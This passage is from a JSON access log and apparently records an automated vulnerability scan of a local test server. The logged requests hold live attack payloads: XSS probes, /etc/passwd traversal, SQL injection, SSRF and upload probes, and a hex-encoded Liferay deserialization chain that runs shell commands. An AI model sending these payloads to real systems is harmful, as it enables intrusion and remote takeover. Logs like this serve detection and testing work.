HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"action=login&u=admin&p=admin256","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service.web HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/init HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"_authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cs/ContentServer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/tmindex.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"297MkvfEhs0SuVbjDl6oACWupUI.txt\x0D\x0Adixell-xweb500-filewrite","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ADSearch.cc?methodToCall=search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logo/297MkvfEhs0SuVbjDl6oACWupUI.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/admin/users?username=anonymous HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/cq/security/userinfo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console-selfservice/SelfService.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?{alert(1)} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storage/logs/laravel.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /img/../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 